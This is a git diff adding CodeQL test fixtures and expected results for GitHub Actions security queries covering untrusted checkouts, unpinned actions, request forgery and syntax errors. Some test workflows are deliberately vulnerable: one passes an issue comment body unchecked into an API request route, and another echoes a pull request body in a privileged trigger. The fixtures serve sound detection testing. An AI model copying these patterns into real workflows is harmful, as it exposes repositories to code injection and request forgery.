.github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref new file mode 100644 index 000000000000..9f17733e16e8 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected new file mode 100644 index 000000000000..6e33259f3922 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -0,0 +1,23 @@ +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref new file mode 100644 index 000000000000..66b3f2cd9bf2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected new file mode 100644 index 000000000000..2b9bf3f2b79a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -0,0 +1,10 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref new file mode 100644 index 000000000000..55bb194f5ecd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 000000000000..a1e4537e9265 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -0,0 +1,26 @@ +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test27.yml:18:9:21:6 | Uses Step | actions/checkout | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test28.yml:17:9:20:6 | Uses Step | actions/checkout | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref new file mode 100644 index 000000000000..6ce4123fa5ed --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml new file mode 100644 index 000000000000..6937467453b2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -0,0 +1,10 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: octokit/request-action@v2 + with: + route: ${{ github.event.comment.body }} + diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected new file mode 100644 index 000000000000..d980139bb357 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref new file mode 100644 index 000000000000..fcb4e41daf88 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -0,0 +1 @@ +Security/CWE-918/RequestForgery.ql diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml new file mode 100644 index 000000000000..a8bfa4ae19a2 --- /dev/null +++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -0,0 +1,7 @@ +on: pull_request_target + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.pull_request.body}} diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected new file mode 100644 index 000000000000..386e6554e2dc --- /dev/null +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected @@ -0,0 +1 @@ +| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' | diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref new file mode 100644 index 000000000000..97c5686103cf --- /dev/null +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -0,0 +1 @@ +Debug/SyntaxError.ql diff --git a/actions/ql/test/query-tests/SyntaxError/options b/actions/ql/test/query-tests/SyntaxError/options new file mode 100644 index 000000000000..096355709a6f --- /dev/null +++ b/actions/ql/test/query-tests/SyntaxError/options @@ -0,0 +1 @@ +semmle-extractor-options: --tolerate-parse-errors --experimental diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml new file mode 100644 index 000000000000..31f43d8b8b29 --- /dev/null +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -0,0 +1,70 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: 'CodeQL' + +on: + push: + branches: [main] + pull_request: + # The branches below must be a subset of the branches above + branches: [main] + schedule: + - cron: '16 2 * * 5' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ['javascript'] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] + # Learn more about CodeQL language support at https://git.io/codeql-language-support + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v3 + + # ℹī¸ Command-line programs to run using the OS shell. + # 📚 https://git.io/JvXDl + + # ✏ī¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml new file mode 100644 index 000000000000..e736d567773b --- /dev/null +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml @@ -0,0 +1,41 @@ +name: 'CodeQL' + +on: + push: + branches: ['master'] + pull_request: + branches: ['master'] + +permissions: + actions: read + contents: read + packages: read + security-events: write + +jobs: + analyze: + name: Analyze + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - language: javascript + os: ubuntu-22.04 + - language: ruby + os: ubuntu-22.04-16core + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 + with: + category: codeql/${{ matrix.language }}/full diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected new file mode 100644 index 000000000000..3c8904a86af1 --- /dev/null +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref new file mode 100644 index 000000000000..75a8fe2398a6 --- /dev/null +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -0,0 +1 @@ +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file